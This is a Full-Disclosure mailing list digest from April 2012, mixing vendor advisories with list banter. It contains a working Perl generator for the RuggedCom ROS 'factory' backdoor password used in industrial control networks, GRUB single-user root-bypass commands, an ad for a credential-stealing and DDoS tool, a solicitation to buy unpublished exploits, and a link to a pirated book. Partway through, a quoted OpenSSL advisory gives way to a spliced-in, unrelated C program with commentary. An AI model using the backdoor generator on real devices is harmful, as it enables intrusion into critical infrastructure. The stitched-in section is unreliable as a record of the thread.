[Full-disclosure] OpenSSL Security Advisory

2012-04-24 Thread Mark J Cox
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

OpenSSL Security Advisory [24 Apr 2012]
===

ASN1 BIO incomplete fix (CVE-2012-2131)
===

It was discovered that the fix for CVE-2012-2110 released on 19 Apr
2012 was not sufficient to correct the issue for OpenSSL 0.9.8.

Please see http://www.openssl.org/news/secadv_20120419.txt for details
of that vulnerability.

This issue only affects OpenSSL 0.9.8v.  OpenSSL 1.0.1a and 1.0.0i
already contain a patch sufficient to correct CVE-2012-2110.

Thanks to Red Hat for discovering and fixing this issue.

Affected users should upgrade to 0.9.8w.

References
==

URL for this Security Advisory:
http://www.openssl.org/news/secadv_20120424.txt


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Fwd: Vulnerability research and exploit writing

2012-04-24 Thread Ferenc Kovacs
Hi,

Anybody else got this message? I think they are spamming the
subscribers/regular participants of the list.

-- Forwarded message --
From: steve ruskin ruskin.st...@gmail.com
Date: Tue, Apr 24, 2012 at 9:56 AM
Subject: Vulnerability research and exploit writing
To: tyr...@gmail.com



Hi,

Trust all is well. I saw your experience in the field of vulnerability and
exploit research and we have a scheme in our company to collaborate with
researchers all over the world where we pay them on research done by them.
Our interest is exploits which run over Windows 7, Snow Leopard with
applications such MS Office, Adobe, Browsers, Media Player , Notepad etc
along with native OS exploits as well as iphone, blackberry exploit. These
exploits should be unpublished though the vulnerability may be public. We
also have requirements to help us do ASLR and DEP bypass for exploits
researched by us.


Once you let us know about your skills and ideas we can provide you with
our empanelment form via which you can register. We will look forward to
your prompt response.


Warm Regards,

Steve Ruskin

-- 
Ferenc Kovács
@Tyr43l - http://tyrael.hu

[Full-disclosure] Cross Site Scripting - Exploitation Penetration Strings

2012-04-24 Thread Research
Title:
==
Cross Site Scripting - Exploitation & Penetration Strings


Date:
=
2012-04-23


References:
===
Download: http://www.vulnerability-lab.com/resources/documents/531.txt



VL-ID:
=
531


Status:

Published


Exploitation-Technique:
===
Sheets


Severity:
=
High


Details:

A lot of people asked us regarding our cross site scripting pentest sheet for a
fuzzer or own scripts. To have some good results you can use the following list
with automatic scripts, software or for manual pentesting. This list goes out to
all friends, nerds, pentesters & exploiters. Please continue the list and we will
update it soon.

Note: This is a technical attack sheet for cross site penetration tests.


Credits:

Vulnerability Laboratory [Research Team]


Disclaimer:
===
The information provided in this document is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. Any modified copy or reproduction, including partially usages, 
of this file requires authorization from Vulnerability-
Lab. Permission to electronically redistribute this alert in its unmodified 
form is granted. All other rights, including the use of 
other media, are reserved by Vulnerability-Lab or its suppliers.

Copyright © 2012 
Vulnerability-Lab




-- 
VULNERABILITY RESEARCH LABORATORY TEAM
Website: www.vulnerability-lab.com
Mail: resea...@vulnerability-lab.com




[Full-disclosure] Microsoft Incremental Linker Integer Overflow

2012-04-24 Thread Walied Assar
Is available at:

http://waleedassar.blogspot.com/2012/04/microsoft-incremental-linker-integer.html

Waliedassar

[Full-disclosure] RuggedCom - Backdoor Accounts in my SCADA network? You don't say...

2012-04-24 Thread jc
Title: Undocumented Backdoor Access to RuggedCom Devices
Author:jc
Organization:  JC CREW
Date:  April 23, 2012
CVE:   CVE-2012-1803

Background:
RuggedCom is one of a handful of networking vendors who capitalize on
the market for Industrial Strength and Hardened networking
equipment.  You'll find their gear installed in traffic control
systems, railroad communications systems, power plants, electrical
substations, and even US military sites.  Beyond simple L2 and L3
networking these devices are also used for serial-to-ip conversion in
SCADA systems and they even support modbus and dnp3.  RuggedCom
published a handy guide to some of their larger customers at
www.ruggedcom.com/about/customers/.  My favorite quote is from a
contractor who installed RuggedCom equipment at a US Air Force base:
"Reliability was not an option."  How unfortunately apropos.

Problem:
An undocumented backdoor account exists within all released versions
of RuggedCom's Rugged Operating System (ROS®).  The username for the
account, which cannot be disabled, is "factory" and its password is
dynamically generated based on the device's MAC address.  Multiple
attempts have been made in the past 12 months to have this backdoor
removed and customers notified.

Exploit:
#!/usr/bin/perl
if (! defined $ARGV[0]) {
print "+== \n";
print "+ RuggedCom ROS Backdoor Password Generator \n";
print "+ JC CREW April 23 2012 \n";
print "+ Usage:\n$0 macaddress \n";
print "+== \n";
exit; }
$a = $ARGV[0];
$a =~ s/[^A-F0-9]+//simg;          # keep only the (uppercase) hex digits of the MAC
@b = reverse split /(\S{2})/,$a;   # split into octets and reverse their order
$c = join "", @b;
$c .= "";
$d = hex($c) % 99929;
print "$d\n";

Example usage:
Given a RuggedCom device with MAC address 00-0A-DC-00-00-00, run some
perl and learn that the password for "factory" is 60644375.

[j...@pig.aids ros]$ ./ruggedfail.pl 00-0A-DC-00-00-00
60644375
[j...@pig.aids ros]$

Shoutouts:
CERT/CC for doing great work in trying to get vendors to actually fix things.
JC CREW

Timeline:
Apr 2011  - Vendor notified directly
Jul 2011   - Vendor verbally acknowledges knowledge of backdoor,
and ceases communication.
Feb 11 2012 - US-CERT notified
Mar 12 2012 - Vendor responds to US-CERT.
Apr 06 2012 - Due to lack of further contact by vendor, CERT sets
public disclosure for April 13 2012
Apr 10 2012 - Vendor states they need another three weeks to alert
their customers, but not fix the vulnerability.
Apr 11 2012 - Clarification requested regarding need for additional three weeks.
Apr 23 2012 - No response from vendor.
Apr 23 2012 - This disclosure.

Keywords:
RuggedCom
ROS
RuggedSwitch
RuggedServer
backdoor



[Full-disclosure] [New tool] - Exploit Pack - Web Security

2012-04-24 Thread nore...@exploitpack.com
Exploit Pack - Web Security Edition

This tool allows you to take control of remote browsers, steal social
network credentials, obtain persistence on it, DDoS and more.
Demo: http://www.youtube.com/watch?v=B_AYyRFNokI

Main features:
- Hacking of Gmail, Yahoo, Facebook, Live, Linkedin
- Session persistence
- 0day exploits included
- Remote browser control
- DDoS by creating botnets
- Launch remote exploits
- Steal credentials

Questions? supp...@exploitpack.com

Official site: http://exploitpack.com



[Full-disclosure] New IETF I-D: Security Implications of IPv6 on IPv4 networks

2012-04-24 Thread Fernando Gont
Folks,

We've published a new IETF I-D entitled Security Implications of IPv6
on IPv4 networks.

The I-D is available at:
http://www.ietf.org/id/draft-gont-opsec-ipv6-implications-on-ipv4-nets-00.txt

The Abstract of the I-D is:
 cut here 
   This document discusses the security implications of native IPv6
   support and IPv6 transition/co-existence technologies on IPv4-only
   networks, and describes possible mitigations for the aforementioned
   issues.
 cut here 

Any feedback will be very welcome.

Thanks!

Best regards,
-- 
Fernando Gont
SI6 Networks
e-mail: fg...@si6networks.com
PGP Fingerprint:  31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492





Re: [Full-disclosure] [New tool] - Exploit Pack - Web Security

2012-04-24 Thread Jerome Athias
Hi,

I think that people here would be more interested by the (new?)
techniques you're using in your tool than by your own (not documented?)
implementation.

ie: are you using MSF browser autopwn technique for browser control?
(Or, will we have to spend individually 3 days to review and test your
tool?)

My 2 cts

/JA

On 23/04/2012 21:52, runlvl wrote:

-- 
Jerome Athias - NETpeas
VP, Director of Software Engineer
Palo Alto - Paris - Casablanca

www.netpeas.com
-
Stay updated on Security: www.vulnerabilitydatabase.com

The computer security is an art form. It's the ultimate martial art.




Re: [Full-disclosure] [New tool] - Exploit Pack - Web Security

2012-04-24 Thread Michele Orru
I'm also wondering if your tool is a clone of our BeEF or not :D

Cheers
antisnatchor

On Tue, Apr 24, 2012 at 11:25 AM, Jerome Athias jer...@netpeas.com wrote:



-- 
/antisnatchor



Re: [Full-disclosure] [New tool] - Exploit Pack - Web Security

2012-04-24 Thread Mario Vilas
s/clone/theft/

On Tue, Apr 24, 2012 at 12:31 PM, Michele Orru antisnatc...@gmail.com wrote:



-- 
“There's a reason we separate military and the police: one fights the
enemy of the state, the other serves and protects the people. When the
military becomes both, then the enemies of the state tend to become
the people.”



[Full-disclosure] Vulnerability in Backtrack

2012-04-24 Thread Григорий Братислава
Is good evening. I is would like to warn you about is vulnerability in
Backtrack is all version.

Backtrack Linux is penetration tester is system. Is come complete with
tool for to make hacking for penetration tester.

In is booting Backtrack, vulnerability exist in booting for when start
if attacker is edit grub, attacker can bypass restricted user and is
boot into admin account. E.g.:

grub edit> kernel /boom/vmlinuz-2.3.11.7 root=/dev/sda1 ro Single
[ENTER]
grub edit> b
# mount -t proc proc /proc
# mount -o remount,rw /
# passwd
[ENTER IS ANYTHING YOU WANT]
# sync
# reboot

I is will make this into video for bypassing security in Backtrack for
to post on InfoSecInstitute

-- 

`Wherever I is go - there am I routed`



[Full-disclosure] [ MDVSA-2012:064 ] openssl0.9.8

2012-04-24 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2012:064
 http://www.mandriva.com/security/
 ___

 Package : openssl0.9.8
 Date: April 24, 2012
 Affected: 2010.1
 ___

 Problem Description:

 It was discovered that the fix for CVE-2012-2110 (MDVSA-2012:060)
 was not sufficient to correct the issue for OpenSSL 0.9.8.
 
 The updated packages have been upgraded to the 0.9.8w version which
 is not vulnerable to this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2131
 http://www.openssl.org/news/secadv_20120424.txt
 ___

 Updated Packages:

 Mandriva Linux 2010.1:
 df65e3a8edab86c687b6645d55a4f340  2010.1/i586/libopenssl0.9.8-0.9.8w-0.1mdv2010.2.i586.rpm
 21a3c6bd6d1af90b3f3851e5fc7ab4fe  2010.1/SRPMS/openssl0.9.8-0.9.8w-0.1mdv2010.2.src.rpm

 Mandriva Linux 2010.1/X86_64:
 069004c734e0e66259df707b0038e273  2010.1/x86_64/lib64openssl0.9.8-0.9.8w-0.1mdv2010.2.x86_64.rpm
 21a3c6bd6d1af90b3f3851e5fc7ab4fe  2010.1/SRPMS/openssl0.9.8-0.9.8w-0.1mdv2010.2.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com



Re: [Full-disclosure] Vulnerability in Backtrack

2012-04-24 Thread Gage Bystrom
*sigh* vulnerability reports like this make me sad.
On Apr 24, 2012 5:50 AM, Григорий Братислава musntl...@gmail.com wrote:


Re: [Full-disclosure] Vulnerability in Backtrack

2012-04-24 Thread Urlan
It makes me laugh! hahahaha

2012/4/24 Gage Bystrom themadichi...@gmail.com


Re: [Full-disclosure] Vulnerability in Backtrack

2012-04-24 Thread Gage Bystrom
Next thing ya know he will publish a disclosure on the default password
being toor.
On Apr 24, 2012 7:41 AM, Urlan urlanc...@gmail.com wrote:


Re: [Full-disclosure] We're now paying up to $20, 000 for web vulns in our services

2012-04-24 Thread Jim Harrison
I'll keep my response short & simple...

This is an old debate, and one which never truly resolves because the contrary 
opinions tend to be so deeply rooted.  I have no objection to anyone wanting to 
earn an _honest_ living finding and reporting vulnerabilities, but somewhere 
along the line, some researchers seem to have taken the position following 
Google and similar offerings that all vendors owe them this living.  They do 
not.  Google has taken a brave (some would say irresponsible) position with 
this program, but this fact alone does not obligate other vendors to follow 
suit.

I don't think anyone will (successfully) argue the relative benefits of paying 
a white-hat a far smaller amount than the cost of responding to a public 
gotchadata!, but as with many polar subjects, things are not always as simple 
as they may appear.  There are (and will always be) legal entanglements for any 
company that would make such offers; especially where there is more at risk 
than just their code or services.  It seems clear that the Google legal team 
has either had their impact on it or been told that they'll deal with things as 
they appear; we'll probably never know.

IMHO, anyone who willingly, knowingly places customer data at risk by inviting 
attacks on their production systems is playing a very dangerous game.  There is 
no guarantee that a vuln discovered by a truly honest researcher couldn't 
become a weapon for the dishonest researcher through secondary discovery 
(GoodBob found it and while it was vulnerable, EvilBob exploited it).  Granted; 
the dishonest researcher is already looking for weak spots, but I don't think 
we want them stumbling onto a hole before the vendor has had time to respond to 
it.  The odds of such an event are probably very small, but hardly zero.

-Original Message-
From: Michal Zalewski [mailto:lcam...@coredump.cx] 
Sent: Monday, April 23, 2012 12:06
To: full-disclosure; dailydave; bugtraq; websecur...@lists.webappsec.org
Subject: FYI: We're now paying up to $20,000 for web vulns in our services

Hey,

Hopefully this won't offend the moderators:

http://googleonlinesecurity.blogspot.com/2012/04/spurring-more-vulnerability-research.html

I suspect I know how the debate will be shaped - and I think I can offer a 
personal insight. I helped shape our vulnerability reward program from the 
start (November 2010), and I was surprised to see that simply having an honest, 
no-nonsense, and highly responsive process like this... well, it works for a 
surprisingly high number of skilled researchers, even if you start with 
relatively modest rewards.

This puts an interesting spin on the conundrum of the black / gray market 
vulnerability trade: you can't realistically outcompete all buyers of 
weaponized exploits, but you can make the issue a lot less relevant. By having 
several orders of magnitude more people reporting bugs through a white hat 
channel, you are probably making underground vulnerabilities a lot harder to 
find, and fairly short-lived.

Cheers,
/mz



[Full-disclosure] [Tool] Introducing plown: security scanner for Plone CMS

2012-04-24 Thread mgogoulos
 

Hi all!

We are pleased to announce the release of plown, a security tool for Plone.
Despite the fact that Plone [1] is one of the most secure CMS, even the most
secure system can be penetrated due to misconfigurations, use of weak
passwords and if the admins never apply the patches released.

Plown [2] has been developed during penetration tests on Plone sites and was
used to ease the discovery of usernames and passwords, plus expose known
Plone vulnerabilities that might exist on a system.

What Plown does

* Username enumeration
* Multithreaded password cracking. You can specify the login url (if
  different than login_form) and the number of threads (16 default)
* Known vulnerability enumeration, based on urls/objects exposed. If found
  vulnerable, the tool informs about the vulnerability and the url of the
  patch
* Version enumeration is planned, based on md5 hashes of static content
  (css, js)

We hope that plown can act as an assistant to system administrators to
strengthen their Plone sites.

code:
https://github.com/unweb/plown/ (written in python)

plown home:
https://unweb.me/projects/open-source/plown

Links:
--
[1] http://plone.org/
[2] https://unweb.me/projects/open-source/plown

Re: [Full-disclosure] incorrect integer conversions in OpenSSL can result in memory corruption.

2012-04-24 Thread sd
+1 duke

https://twitter.com/#!/mdowd/status/192986878138523648
http://i.imgur.com/dOjJt.jpg

Buy: 
http://www.amazon.com/Software-Security-Assessment-Vulnerabilities-ebook/dp/B004XVIWU2
Steal: http://uploaded.to/file/nuq1ws67/032126.chm

2012/4/19 Tavis Ormandy tav...@cmpxchg8b.com:
 Incorrect integer conversions in OpenSSL can result in memory corruption.
 --

 CVE-2012-2110

 This advisory is intended for system administrators and developers exposing
 OpenSSL in production systems to untrusted data.

 asn1_d2i_read_bio in OpenSSL contains multiple integer errors that can cause
 memory corruption when parsing encoded ASN.1 data. This error can be exploited
 on systems that parse untrusted data, such as X.509 certificates or RSA public
 keys.

 The following context structure from asn1.h is used to record the current state
 of the decoder:

 typedef struct asn1_const_ctx_st
 {
    const unsigned char *p;/* work char pointer */
    int eos;    /* end of sequence read for indefinite encoding */
    int error;  /* error code to use when returning an error */
    int inf;    /* constructed if 0x20, indefinite is 0x21 */
    int tag;    /* tag from last 'get object' */
    int xclass; /* class from last 'get object' */
    long slen;  /* length of last 'get object' */
    const unsigned char *max; /* largest value of p allowed */
    const unsigned char *q;/* temporary variable */
    const unsigned char **pp;/* variable */
    int line;   /* used in error processing */
 } ASN1_const_CTX;

 These members are populated via calls to ASN1_get_object and asn1_get_length
 which have the following prototypes

 int ASN1_get_object(const unsigned char **pp,
                    long *plength,
                    int *ptag,
                    int *pclass,
                    long omax);

 int asn1_get_length(const unsigned char **pp,
                    int *inf,
                    long *rl,
                    int max);

 The lengths are always stored as signed longs, however, asn1_d2i_read_bio
 casts ASN1_const_CTX->slen to a signed int in multiple locations. This
 truncation can result in numerous conversion problems.

 The most visible example on x64 is this cast incorrectly interpreting the
 result of asn1_get_length.

 222             /* suck in c.slen bytes of data */
 223             want=(int)c.slen;

 A simple way to demonstrate this is to prepare a DER certificate that contains
 a length with the 31st bit set, like so

 $ dumpasn1 testcase.crt
 0 NDEF: [PRIVATE 3] {
   2 2147483648:   [1]
        ...
   }

 Breakpoint 2, asn1_d2i_read_bio (in=0x9173a0, pb=0x7fffd8f0) at a_d2i_fp.c:224
 224             if (want > (len-off))
 (gdb) list
 219             }
 220         else
 221             {
 222             /* suck in c.slen bytes of data */
 223             want=(int)c.slen;
 224             if (want > (len-off))
 225                 {
 226                 want-=(len-off);
 227                 if (!BUF_MEM_grow_clean(b,len+want))
 228                     {
 (gdb) p c.slen
 $18 = 2147483648
 (gdb) p want
 $19 = -2147483648

 This results in an inconsistent state, and will lead to memory corruption.

 
 Affected Software
 

 All versions of OpenSSL on all platforms up to and including version 1.0.1 are
 affected.

 Some attack vectors require an I32LP64 architecture, others do not.

 
 Consequences
 ---

 In order to explore the subtle problems caused by this, an unrelated bug in the
 OpenSSL allocator wrappers must be discussed.

 It is generally expected that the realloc standard library routine should support
 reducing the size of a buffer, as well as increasing it. As ISO C99 states "The
 realloc function deallocates the old object pointed to by ptr and returns a
 pointer to a new object that has the size specified by size. The contents of the
 new object shall be the same as that of the old object prior to deallocation,
 up to the lesser of the new and old sizes."

 However, the wrapper routines from OpenSSL do not support shrinking a buffer,
 due to this code:

 void *CRYPTO_realloc_clean(void *str, int old_len, int num, const char *file, int line)
 {
    /* ... */
    ret=malloc_ex_func(num,file,line);
    if(ret)
        {
        memcpy(ret,str,old_len);
        OPENSSL_cleanse(str,old_len);
        free_func(str);
        }
    /* ... */
    return ret;
 }

 The old data is always copied over, regardless of whether the new size will be
 enough. This allows us to turn this truncation into what is effectively:

    memcpy(heap_buffer, attacker controlled buffer, attacker controlled size);

 We can reach this code by simply causing an integer to be sign extended and
 truncated multiple times. These two protoypes are relevant:

 int BUF_MEM_grow_clean(BUF_MEM *str, size_t len);

 void *CRYPTO_realloc_clean(void *str, int old_len, 
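The two defects described in the advisory above, modelled in a stand-alone C
program added here as an example. This is not OpenSSL's code: the functions
(truncated_want, grow_check_skipped, checked_want, spill_bytes,
realloc_clean_safe, safe_shrink_keeps_prefix) are this example's own, the
"hardened" check is the example's and not the upstream patch, and the
overflowing copy is reproduced against a guard-padded buffer so the program
only ever writes memory it owns.

```c
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Defect 1: the long -> int narrowing in asn1_d2i_read_bio (want=(int)c.slen).
 * With a 64-bit long, a length of 2^31 narrows to INT_MIN (gcc and clang wrap
 * the value; the C standard calls the result implementation-defined).      */
static int truncated_want(int64_t slen)
{
    return (int)slen;
}

/* Reproduces the growth decision "if (want > (len-off))" for a given length.
 * Returns 1 when a negative want makes the caller skip growing the buffer. */
static int grow_check_skipped(int64_t slen, int len, int off)
{
    int want = truncated_want(slen);
    return want > (len - off) ? 0 : 1;
}

/* Hardened variant (this example's own check, not the upstream patch): only
 * lengths that survive the long -> int conversion unchanged are accepted;
 * everything else is reported as -1 and must be treated as an error.       */
static int64_t checked_want(int64_t slen)
{
    if (slen < 0 || slen > INT_MAX)
        return -1;
    return slen;
}

/* Defect 2: the quoted CRYPTO_realloc_clean copies old_len bytes into a
 * num-byte block, so a shrink (num < old_len) writes old_len - num bytes past
 * the end of the new allocation.  spill_bytes() performs the same unconditional
 * memcpy into a destination padded with old_len guard bytes (so the write stays
 * inside an allocation we own) and returns how many guard bytes were hit.   */
static size_t spill_bytes(size_t old_len, size_t num)
{
    unsigned char *src = malloc(old_len);
    unsigned char *dst = malloc(num + old_len);   /* num usable bytes + guard */
    size_t spilled = 0, i;

    if (src == NULL || dst == NULL) {
        free(src);
        free(dst);
        return (size_t)-1;
    }
    memset(src, 'A', old_len);                    /* "attacker controlled buffer" */
    memset(dst, 0xAA, num + old_len);             /* guard pattern */
    memcpy(dst, src, old_len);                    /* the wrapper's memcpy(ret,str,old_len) */
    for (i = num; i < num + old_len; i++)
        if (dst[i] == 'A')
            spilled++;
    free(src);
    free(dst);
    return spilled;
}

/* Corrected wrapper: copy only the lesser of the two sizes, as C99 realloc
 * does, then wipe and release the old block.                                */
static void *realloc_clean_safe(void *str, size_t old_len, size_t num)
{
    void *ret = malloc(num);
    if (ret != NULL) {
        memcpy(ret, str, old_len < num ? old_len : num);
        /* stands in for OPENSSL_cleanse; a plain memset before free() can be
         * optimised away, real code needs a wipe the compiler cannot drop   */
        memset(str, 0, old_len);
        free(str);
    }
    return ret;
}

/* Shrinks an 8-byte block to 4 bytes with the safe wrapper and checks that
 * the surviving prefix is intact.  Returns 1 on success, 0 otherwise.       */
static int safe_shrink_keeps_prefix(void)
{
    char *p = malloc(8);
    char *q;
    int ok;

    if (p == NULL)
        return 0;
    memcpy(p, "ABCDEFGH", 8);
    q = realloc_clean_safe(p, 8, 4);              /* frees p on success */
    if (q == NULL) {
        free(p);
        return 0;
    }
    ok = memcmp(q, "ABCD", 4) == 0;
    free(q);
    return ok;
}

int main(void)
{
    int64_t slen = (int64_t)1 << 31;              /* the c.slen from the gdb session */

    printf("want = %d, growth skipped = %d\n",
           truncated_want(slen), grow_check_skipped(slen, 1024, 0));
    printf("checked_want(2^31) = %lld\n", (long long)checked_want(slen));
    printf("shrinking 16 -> 4 with the old wrapper spills %zu bytes\n",
           spill_bytes(16, 4));
    printf("safe shrink keeps prefix: %d\n", safe_shrink_keeps_prefix());
    return 0;
}
```

Built with gcc -std=c99 on an LP64 host, the program reproduces the negative
want of -2147483648 for the 2^31 length seen in the gdb session, shows that
the growth check is skipped for it, and reports 12 guard bytes clobbered when
the old wrapper pattern shrinks a 16-byte block to 4 bytes; the safe wrapper
keeps the 4-byte prefix and spills nothing.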

Re: [Full-disclosure] Vulnerability in Backtrack

2012-04-24 Thread Sergio Arcos
I have a more critical vulnerability: root default password is toor

¬¬


2012/4/24 Григорий Братислава musntl...@gmail.com

 Is good evening. I is would like to warn you about is vulnerability in
 Backtrack is all version.

 Backtrack Linux is penetration tester is system. Is come complete with
 tool for to make hacking for penetration tester.

 In is booting Backtrack, vulnerability exist in booting for when start
 if attacker is edit grub, attacker can bypass restricted user and is
 boot into admin account. E.g.:

 grub edit  kernel /boom/vmlinuz-2.3.11.7 root=/dev/sda1 ro Single
 [ENTER]
 grub edit  b
 # mount -t proc proc /proc
 # mount -o remount,rw /
 # passwd
 [ENTER IS ANYTHING YOU WANT]
 # sync
 # reboot

 I is will make this into video for bypassing security in Backtrack for
 to post on InfoSecInstitute

 --

 `Wherever I is go - there am I routed`



Re: [Full-disclosure] Vulnerability in Backtrack

2012-04-24 Thread David3 Gonnella
It makes me scared! It's on my distro too! DOH! ;P


On 04/24/12 16:41, Urlan wrote:
 It makes me laugh! hahahaha

 2012/4/24 Gage Bystrom themadichi...@gmail.com

 *sigh* vulnerability reports like this make me sad.
 On Apr 24, 2012 5:50 AM, Григорий Братислава musntl...@gmail.com
 wrote:

 Is good evening. I is would like to warn you about is vulnerability in
 Backtrack is all version.

 Backtrack Linux is penetration tester is system. Is come complete with
 tool for to make hacking for penetration tester.

 In is booting Backtrack, vulnerability exist in booting for when start
 if attacker is edit grub, attacker can bypass restricted user and is
 boot into admin account. E.g.:

 grub edit  kernel /boom/vmlinuz-2.3.11.7 root=/dev/sda1 ro Single
 [ENTER]
 grub edit  b
 # mount -t proc proc /proc
 # mount -o remount,rw /
 # passwd
 [ENTER IS ANYTHING YOU WANT]
 # sync
 # reboot

 I is will make this into video for bypassing security in Backtrack for
 to post on InfoSecInstitute

 --

 `Wherever I is go - there am I routed`







Re: [Full-disclosure] We're now paying up to $20, 000 for web vulns in our services

2012-04-24 Thread Michal Zalewski
 IMHO, anyone who willingly, knowingly places customer data at risk by 
 inviting attacks on their production systems is playing a very dangerous 
 game. There is no guarantee that a vuln discovered by a truly honest 
 researcher couldn't become a weapon for the dishonest researcher through 
 secondary discovery

I'm not sure I follow. Are you saying that the dishonest researcher
will not try to find vulnerabilities if there is no reward program for
the honest ones?

/mz



[Full-disclosure] Vulnerability in Gentoo hardened

2012-04-24 Thread klondike
On 24/04/12 14:41, Григорий Братислава wrote:
 Is good evening.
Is good afternoon.
  I is would like to warn you about is vulnerability in
 Backtrack is all version.
I is want to advise you on one failure in Gentoo Hardened at all types
 Backtrack Linux is penetration tester is system. Is come complete with
 tool for to make hacking for penetration tester.
Gentoo Hardened is advanced security is system. Is come complete with
hardened nucleum for to make at system is securer
 In is booting Backtrack, vulnerability exist in booting for when start
 if attacker is edit grub, attacker can bypass restricted user and is
 boot into admin account. E.g.:
In is making Gentoo Hardened, failure exist in sysadmin at when usage if
attacker is rubber hose, attacker can override authentication and is
make admin account. Making simple program. E.g.:
1. Apply rubber hose for sysadmin
2. Ask at password and try it.
3. If error make 1.

 I is will make this into video for bypassing security in Backtrack for
 to post on InfoSecInstitute
I is will be this for video by bypassing security at Gentoo Hardened or
to post by Youtube. I is named Reservoir Dogs.

PD: Bad English written on purpose, please forgive me for any correct
grammar I may have used :P
PD2: Григорий, seeing your history I think the mail was a joke but
anyway, just in the improbable case it may not be:
  1. Bad administration issues are not global to a distro issues.
  2. Make sure a vulnerability is not a not so secure by design feature.
  3. Really if you ever want to write a paper or something make sure you
get it read by at least two or three English speaking partners for
your own sake.




Re: [Full-disclosure] We're now paying up to $20, 000 for web vulns in our services

2012-04-24 Thread Charles Morris
On Tue, Apr 24, 2012 at 11:13 AM, Michal Zalewski lcam...@coredump.cx wrote:
 IMHO, anyone who willingly, knowingly places customer data at risk by 
 inviting attacks on their production systems is playing a very dangerous 
 game. There is no guarantee that a vuln discovered by a truly honest 
 researcher couldn't become a weapon for the dishonest researcher through 
 secondary discovery

 I'm not sure I follow. Are you saying that the dishonest researcher
 will not try to find vulnerabilities if there is no reward program for
 the honest ones?

 /mz


I'm not sure what he means either, however I know that many
organizations treat security patches to the same lifecycle as features,
which means sometimes upwards of a year of testing- thus giving a huge
window for secondary discovery; whereas a vuln exploited in-the-wild
generally has a much faster patch. Still I'm not sure how this fact is
relevant, if it is at all. Perhaps if the adversary sees the vuln in
unencrypted email between researcher and organization and then uses it
silently making sure not to alert anyone? Not sure, but I digress.

I don't know who believes that they are owed anything in this
manner, and I agree with you, Jim, on that point.

However, my main complaint is that businesses should either not pay
anything at all (perhaps 1$ as a token of gratitude, some swag or some
such), or at least make a real effort. Finding a code execution vuln in
google's whatever app-of-the-day is non-trivial task that requires
researchers to learn a completely new landscape. I would expect Google,
of all people, to pay 10x to 100x this amount for this sort of thing..
A you-only-get-it-when-successful 20,000$ budget from Google is
insulting, considering the perhaps massive time investment from the
researcher.

There is zero ability to make an argument that such businesses can't
realistically outcompete all buyers of weaponized exploits as Michal
has done [ :'( ].
The huge amount of damage that a badguy code executing on google
wallet would cost far more than 2M in damages, repair work, lost
business, and penalties;
and yet they only pay a nice researcher 20 grand? You can't even live
on that. Researchers aren't just kids with no responsibilities, they
have mortgages and families.

Increase the payouts and you not only get good guys doing good things
but you also get bad guys doing good things (even if for the wrong
reasons).

n.b. The fact that badguys take risk when doing their badguy
activities, including selling exploits, makes it even easier to
outcompete the buyers.

Still, this is a huge improvement on what it was if memory serves. A
million thanks to Michal !



Re: [Full-disclosure] Vulnerability in Gentoo hardened

2012-04-24 Thread Milan Berger
 PD: Bad English written on purpose, please forgive me for any correct
 grammar I may have used :P
 PD2: Григорий seeing your historial I think the mail was a joke but

if you read his advisories and 0-days you know: It's not a joke...


-- 
Kind Regards

Milan Berger
Project-Mindstorm Technical Engineer

---
project-mindstorm.net
Fruehlingstrasse 4 
90537 Feucht
Germany

Mob.: +49 176 22 98 76 02

https://www.ghcif.de
http://www.nopaste.info (for sale)
https://www.digital-bit.ch
http://www.project-mindstorm.net


twitter: http://twitter.com/twit4c


Re: [Full-disclosure] We're now paying up to $20, 000 for web vulns in our services

2012-04-24 Thread Michal Zalewski
 A you-only-get-it-when-successful 20,000$ budget from Google is
 insulting, considering the perhaps massive time investment from
 the researcher. [...] and yet they only pay a nice researcher 20
 grand? You can't even live on that. Researchers aren't just kids
 with no responsibilities, they have mortgages and families

People who want to make a living helping to improve Google security
are welcome to apply for a job :-) We have a remarkably large and
interesting security team.

The program simply serves to complement that (and some other,
contract-driven efforts), and it works for quite a few people who see
it as a way to do something useful on the side, and get compensated
for it, too.

Now, I have done a fair amount of vulnerability research in my life, I
do have a family and a mortgage - and I still wouldn't see $20k as an
insult; but I know that this is subjective. In that spirit, you are at
liberty to determine whether to participate, and how much time to
invest into the pursuit :-)

Cheers,
/mz



Re: [Full-disclosure] Vulnerability in Gentoo hardened

2012-04-24 Thread Valdis . Kletnieks
On Tue, 24 Apr 2012 17:36:55 +0200, Milan Berger said:
 if you read his advisories and 0-days you know: It's not a joke...

I always thought it was misunderstood performance art...



Re: [Full-disclosure] Vulnerability in Gentoo hardened

2012-04-24 Thread Thor (Hammer of God)
Which always turns out to be the best...

Sent from my Windows Phone

From: valdis.kletni...@vt.edu
Sent: 4/24/2012 9:16 AM
To: Milan Berger
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Vulnerability in Gentoo hardened

On Tue, 24 Apr 2012 17:36:55 +0200, Milan Berger said:
 if you read his advisories and 0-days you know: It's not a joke...

I always thought it was misunderstood performance art...

Re: [Full-disclosure] We're now paying up to $20, 000 for web vulns in our services

2012-04-24 Thread Ramon de C Valle


